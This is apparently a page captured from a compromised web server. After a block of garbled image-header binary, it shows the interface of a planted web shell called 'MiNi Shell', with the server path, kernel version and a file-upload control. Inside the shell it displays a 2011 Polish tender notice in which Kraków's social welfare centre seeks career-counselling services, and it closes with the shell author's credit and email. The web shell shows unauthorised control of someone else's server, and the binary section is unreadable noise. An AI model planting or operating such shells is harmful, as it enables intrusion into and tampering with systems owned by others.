JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110524/127230-N-2011.html

<p class="kh_header"><b>Kraków: Świadczenie usług doradcy zawodowego dla uczestników 
Punktu Aktywności Lokalnej oraz 
uczestników projektu Pora na aktywność</b><br>
<b>Numer ogłoszenia: 127230 - 2011; data zamieszczenia: 24.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradcy zawodowego dla uczestników 
Punktu Aktywności Lokalnej oraz 
uczestników projektu Pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część zamówienia: 
Świadczenie usług doradztwa zawodowego dla uczestników PAL Dz. V i VII. 

CPV: 85312320-8 Usługi doradztwa.

1.	Przedmiotem zamówienia jest świadczenie usług doradcy zawodowego dla min.                   20 uczestników PAL Dz. V i VII, w szczególności poprzez: świadczenie usług w zakresie informacji i poradnictwa zawodowego, związanych z planowaniem kariery zawodowej dla osób bezrobotnych oraz poszukujących pracy, udzielanie indywidualnych i grupowych informacji i porad zawodowych; udzielanie porad indywidualnych i grupowych związanych z podejmowaniem decyzji zawodowych w zakresie wyboru zawodu, kierunku dalszego kształcenia  lub szkolenia zawodowego oraz miejsca pracy; przekazywanie wiedzy i informacji o zawodach, możliwościach zdobycia kwalifikacji zawodowych, sytuacji na rynku pracy; stosowanie właściwych metod, narzędzi i technik z obszaru poradnictwa zawodowego.
2.	W celu prawidłowej realizacji usługi doradca zawodowy: 
a)	współpracuje z uczestnikami PAL, 
b)	współpracuje z pracownikami Zamawiającego w zakresie wykonywanych zadań,                          w szczególności w zakresie wymiany informacji, prowadzenia wspólnych działań                   z pracownikami projektu, konsultacji,
c)	prowadzi obowiązującą dokumentację, w tym: kartę uczestnika PAL, listy obecności, miesięczne sprawozdania z realizowanych działań,
d)	wykonywanie innych czynności zleconych przez animatora lokalnego w ramach zajmowanego stanowiska
3.	Zakres merytoryczny zamawianej usługi: doradztwo zawodowe, obejmujące:  przygotowanie dokumentów aplikacyjnych (CV, list motywacyjny), przygotowanie do rozmowy o pracę,  autoprezentacja w kontaktach z pracodawcą,  sposoby aktywnego poszukiwania pracy,  planowanie kariery zawodowej: wybór zawodu, wybór kierunku dalszego kształcenia, szkolenia zawodowego oraz miejsca pracy, budowanie ścieżki rozwoju zawodowego, możliwości dokształcania zawodowego, sytuacja na rynku pracy.
4.	Formy i narzędzia pracy: wywiad wstępny, poradnictwo indywidualne i grupowe, analiza dokumentów i wyników specjalistycznych badań, określenie profilu zawodowego, opiniowanie o możliwych do realizacji kursach zawodowych. Doradca uwzględnia sytuację życiową klienta, jego możliwości psychofizyczne, potrzeby rynku pracy                       i możliwości systemu edukacyjnego.
5.	Wykonawca zapewni uczestnikom PAL materiały wykorzystywane przy realizacji usługi                               w szczególności: wzór CV, listu motywacyjnego, formularz testu zawodowego, indywidualnego planu działania, formularz ilustrujący profil zawodowy klienta.
6.	Wykonawca wyda Zamawiającemu opinię zawierającą co najmniej: 
a)	informację o predyspozycjach klienta w zakresie możliwych do wykonywania zawodów, 
b)	wytyczne dla pracownika socjalnego dotyczące dalszej pracy z klientem, zawierające: wskazane formy pracy z klientem budujące jego kompetencje zawodowe, kompetencje klienta, które należy utrwalać w ramach pracy socjalnej, informacje                o szczególnych zdolnościach/ograniczeniach klienta mogących mieć wpływ na jego karierę zawodową. 
7.	Przyjmujący zlecenie zobowiązuje się do wykonywania czynności określonych w ust. 1 zgodnie z miesięcznym harmonogramem pracy sporządzonym przez animatora lokalnego, w okresie od dnia podpisania umowy do dnia 30 listopada 2012 roku.  Harmonogram zostanie przedłożony wykonawcy do 25 dnia miesiąca poprzedzającego miesiąc wykonania usługi. 
8.	Jeżeli Wykonawca zostanie poinformowany (e-mailem, faksem lub pisemnie)                           o rezygnacji klienta z usługi dla danego beneficjenta w konkretnym terminie do 24 godzin przed jej rozpoczęciem, Zamawiający nie zapłaci wynagrodzenia za gotowość do świadczenia usługi.
9.	Miejsce świadczenia usługi: Kraków, ul. Urzędnicza 20/3 lub inne miejsce na terenie Dzielnicy V i VII miasta Krakowa, wskazane przez Animatora Lokalnego w zakresie nie większym niż 20% wymiaru usługi.
10.	Dni świadczenia usługi: od poniedziałku  do piątku  w godzinach przedziale czasowym od 09:00 do 18:00  w okresie od dnia podpisania umowy do 30 listopada 2012 roku.
11.	Przewidywana liczba godzin zajęć: maksymalnie 300 godzin.
12.	Osobą odpowiedzialną za realizację zadania i upoważnioną do kontaktów z Wykonawcą  jest animator lokalny lub osoba go zastępująca.
13.	Przyjmuje się miesięczny okres rozliczeniowy, na podstawie  wystawionej faktury lub rachunku potwierdzonych przez  animatora lokalnego lub osobę go zastępującą.
14.	Zapłata wynagrodzenia nastąpi po przedłożeniu przez Wykonawcę faktury lub rachunku w terminie 14 dni od daty przyjęcia faktury lub rachunku przez Zamawiającego, przelewem na wskazany przez Wykonawcę rachunek bankowy.

II część zamówienia:
Świadczenie usług doradztwa zawodowego dla uczestników projektu Pora na aktywność. 

CPV: 85312320-8 Usługi doradztwa.

1.	Przedmiotem zamówienia jest świadczenie usług doradztwa zawodowego dla uczestników projektu Pora na aktywność. Zakres zamawianej usługi: doradztwo zawodowe, obejmujące: wywiad wstępny, przygotowanie dokumentów aplikacyjnych (CV, list motywacyjny), przygotowanie do rozmowy o pracę, ćwiczenie autoprezentacji z beneficjentem, prezentację sposobów aktywnego poszukiwania pracy, a także w zależności od sytuacji i deklarowanej lub zdiagnozowanej potrzeby klienta pomoc w wyborze odpowiedniego zawodu, budowanie ścieżki rozwoju zawodowego, prezentację możliwości dokształcania zawodowego, opiniowanie o możliwych do realizacji kursach zawodowych. Doradca uwzględnia sytuację życiową klienta, jego możliwości psychofizyczne, potrzeby rynku pracy i możliwości systemu edukacyjnego. 
2.	Wykonawca zapewni materiały wykorzystywane przy realizacji usługi w szczególności: wzór CV, listu motywacyjnego, formularz testu zawodowego, indywidualnego planu działania, formularz ilustrujący profil zawodowy klienta.
3.	Usługa będzie świadczona w maksymalnym wymiarze 450 godzin zegarowych w postaci indywidualnego doradztwa,  w tym:
1)	w pierwszym i drugim miesiącu realizacji usługi w wymiarze co najmniej 100 godzin zegarowych,
2)	w kolejnych miesiącach realizacji usługi w wymiarze co najmniej 10 godzin zegarowych.
W zależności od potrzeb klienta jednorazowo spotkanie w ramach usługi trwać będzie jedną lub dwie godziny zegarowe. 
4.	Doradca będzie świadczył usługę w lokalu zapewnionym przez Wykonawcę na terenie miasta Krakowa, położonym najdalej 1 km od najbliższego przystanku komunikacji zbiorowej. W uzasadnionych sytuacjach losowych zaakceptowanych przez Zamawiającego, zgłaszanych przez klientów lub Zamawiającego usługa będzie mogła się odbywać w domu beneficjenta lub lokalu Zamawiającego. Spotkania w domu beneficjenta lub lokalu Zamawiającego będą odbywać się w ilości nie więcej niż 135 godzin
5.	Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez Zamawiającego lub podmiot kontrolujący Zamawiającego.
6.	Termin i miejsce realizacji usługi: od podpisania umowy do 31.12.2012 r. Spotkania będą odbywać się w godzinach pracy Zamawiającego, tj. w poniedziałki w godz. 9-17, od wtorku do piątku 7:30-15:30. 
7.	Sposób realizacji zamówienia:
1)	Realizacja usługi w pierwszym miesiącu: 
Wykonawca w terminie do 3 dni roboczych od daty zawarcia umowy przekaże Zamawiającemu (e-mailem, faksem lub pisemnie) możliwe do wykorzystania terminy wraz z określeniem dat i godzin. Zamawiający w terminie 7 dni roboczych od daty otrzymania od Wykonawcy ww. terminów, zgłosi Wykonawcy (w formie e-maila lub faksu) wykaz beneficjentów wraz określeniem ilości godzin przypadających na pierwsze spotkanie dla danego beneficjenta. Wykonawca opracuje harmonogram spotkań i przekaże go Zamawiającemu (e-mailem, faksem lub pisemnie) w terminie 3 dni roboczych od daty otrzymania ww. zgłoszeń.
2)	Realizacja usługi w kolejnych miesiącach:
Wykonawca w terminie do 5-go dnia miesiąca poprzedzającego miesiąc realizacji usługi, przekazuje Zamawiającemu (e-mailem, faksem lub pisemnie) możliwe do wykorzystania terminy wraz z określeniem dat i godzin. Zamawiający w terminie do 20-go dnia miesiąca poprzedzającego miesiąc realizacji usługi, zgłasza Wykonawcy (w formie e-maila lub faksu) beneficjentów wraz określeniem ilości godzin przypadających na pierwsze spotkanie dla danego beneficjenta. Wykonawca opracowuje harmonogram spotkań i przekazuje go Zamawiającemu (e-mailem, faksem lub pisemnie) w terminie do 26-go dnia miesiąca poprzedzającego miesiąc realizacji usługi. 
3)	W przypadku zgłaszania przez uczestników zajęć potrzeby zmiany terminu Wykonawca w porozumieniu z Zamawiającym dokonuje modyfikacji terminów spotkań i na bieżąco przekazuje zmodyfikowany harmonogram Zamawiającemu. 
4)	Jeżeli Wykonawca zostanie poinformowany (e-mailem, faksem lub pisemnie)                    o rezygnacji klienta z usługi dla danego beneficjenta w konkretnym terminie do 24 godzin przed jej rozpoczęciem, Zamawiający nie zapłaci wynagrodzenia za gotowość do świadczenia usługi.
5)	Doradca będzie wypełniał kartę realizacji usługi w trakcie poszczególnych spotkań. Karta realizacji usługi będzie potwierdzana przez klienta. 
6)	Wykonawca wyda Zamawiającemu opinię zawierającą co najmniej: 
a)	informację o predyspozycjach klienta w zakresie możliwych do wykonywania zawodów, 


b)	wytyczne dla pracownika socjalnego dotyczące dalszej pracy z klientem, zawierające:
wskazane formy pracy z klientem budujące jego kompetencje zawodowe,
kompetencje klienta, które należy utrwalać w ramach pracy socjalnej,
informacje o szczególnych zdolnościach/ograniczeniach klienta mogących mieć wpływ na jego karierę zawodową. 
7)	W przypadku realizowania usługi w sposób niezgodny z umową, Zamawiający zastrzega sobie prawo rozwiązania umowy bez wypowiedzenia lub możliwość zmiany przez Wykonawcę osoby świadczącej usługę na inną osobę spełniająca wymogi określone w siwz. 
8)	Warunki płatności: Za okres rozliczeniowy przyjmuje się miesiąc kalendarzowy. Rozliczanie usługi nastąpi na podstawie kart realizacji usługi oraz  na podstawie rachunku/faktury zaliczkowej.
9)	Wykonawca musi dysponować 1 osobą zdolną do wykonania zamówienia, tj.: posiadającą doświadczenie w świadczeniu usługi doradztwa zawodowego w wymiarze co najmniej 100 godzin oraz posiadającą kwalifikacje zawodowe doradcy zawodowego zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 20 października 2004 r. w sprawie trybu nadawania licencji zawodowych pośrednika pracy i doradcy zawodowego lub która ukończyła studia podyplomowe z zakresu doradztwa zawodowego.
10)	Osobą odpowiedzialną za realizację zadania i upoważnioną do kontaktów z Wykonawcą  jest animator lokalny lub osoba go zastępująca.

Warunki dodatkowe, wspólne dla obu części zamówienia:
1.	Wszelkie kontakty z zamawiającym mogą odbywać się w godzinach pracy Zamawiającego,  tj. w poniedziałek w godzinach od 9:00 do 17:00 oraz od wtorku            do piątku w godzinach od 7:30 do 15:30,
2.	Zamawiający ustala, że oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie w formie pisemnej, faksem lub drogą elektroniczną, na adres: do@mops.krakow.pl..
3.	(Dotyczy  Wykonawców prowadzących działalność gospodarczą osobiście). Zamówienia nie może wykonywać osoba zatrudniona przy realizacji projektu Pora na aktywność na podstawie umowy o pracę lub jeśli zachodzi konflikt interesów lub podwójne finansowanie - zatrudniona jednocześnie w:
Instytucji Zarządzającej - Departamencie Zarządzania Europejskim Funduszem Społecznym w Ministerstwie Rozwoju Regionalnego, 
Instytucji Pośredniczącej - Departamencie Polityki Regionalnej Urzędu Marszałkowskiego Województwa Małopolskiego, 
Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia) - Wojewódzkim Urzędzie Pracy w Krakowie, 
Regionalnym Ośrodku EFS, 
Krajowym Ośrodku EFS, 
Krajowej Instytucji Wspomagającej - Centrum Projektów Europejskich

Konflikt interesów ma miejsce wtedy, gdy ta sama osoba realizuje zadania na rzecz projektu Pora na aktywność, a jednocześnie we wskazanej powyżej instytucji zajmuje stanowisko związane np. z oceną tego projektu, przyznaniem mu dofinansowania, uznaniem poniesionych w ramach projektu wydatków za kwalifikowalne. Każdą sytuację, w której praca w danej instytucji może mieć związek i wpływ na realizację projektu Pora na aktywność należy traktować jako potencjalny konflikt interesów, co uniemożliwia zatrudnienie w ramach projektu. 

Podwójne finansowanie zachodzi wtedy, gdy zarówno praca w ramach projektu Pora na aktywność, jak i praca we wskazanej powyżej instytucji finansowana jest ze środków Europejskiego Funduszu Pracy. 

W przypadku wykonywania zadania na rzecz więcej niż jednego projektu  finansowanego ze środków EFS, Europejskiego Funduszu Rozwoju Regionalnego lub Funduszu Spójności lub wykonywania innych zadań w ramach projektu Pora na aktywność na podstawie umowy cywilno-prawnej Wykonawca zobowiązany jest się do prowadzenia ewidencji czasu pracy wykonywanej na rzecz każdego z projektów, z wyszczególnieniem w jakich godzinach wykonuje pracę dla poszczególnych projektów, których jest pracownikiem. Ewidencja zostanie załączona każdorazowo do rachunku za zrealizowaną usługę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kwalifikacje zawodowe doradcy zawodowego, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 20 października 2004 r. w sprawie trybu nadawania licencji zawodowych pośrednika pracy i doradcy zawodowego lub ukończone studia podyplomowe z zakresu doradztwa zawodowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kwalifikacje i doświadczenie zawodowe tj.: ukończone studia wyższe, posiadają kwalifikacje zawodowe doradcy zawodowego, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 20 października 2004 r. w sprawie trybu nadawania licencji zawodowych pośrednika pracy i doradcy zawodowego lub ukończone studia podyplomowe z zakresu doradztwa zawodowego oraz wykonali minimum: 
a)	w zakresie I części zamówienia: 100 godzin świadczenia usług doradcy zawodowego w okresie ostatnich 3 lat, popartych dokumentami stwierdzającymi należyte wykonanie usługi. Zamawiający zastrzega sobie prawo żądania od Wykonawcy, z którym zostanie zawarta umowa uwierzytelnionych kserokopii dokumentów potwierdzających kwalifikacje zawodowe osób uczestniczących w wykonywaniu zamówienia. Dokumenty te Wykonawca będzie zobowiązany dostarczyć najpóźniej w dniu podpisania umowy,
b)	w zakresie II części zamówienia: co najmniej 100 godzin świadczenia usług doradcy zawodowego w okresie ostatnich 3 lat, popartych dokumentami stwierdzającymi należyte wykonanie usługi. Zamawiający zastrzega sobie prawo żądania od Wykonawcy, z którym zostanie zawarta umowa uwierzytelnionych kserokopii dokumentów potwierdzających kwalifikacje zawodowe osób uczestniczących w wykonywaniu zamówienia. Dokumenty te Wykonawca będzie zobowiązany dostarczyć najpóźniej w dniu podpisania umowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - Liczba godzin wykonanych usług w okresie ostatnich 3 lat - 0.20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści niniejszej umowy w zakresie:
a)	warunków płatności,
b)	zmniejszenia ilości godzin świadczonej usługi,
c)	miejsca świadczenia usługi.
Zmiana treści niniejszej umowy nie może być niekorzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
pok.002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2011 godzina 11:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego projekt Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com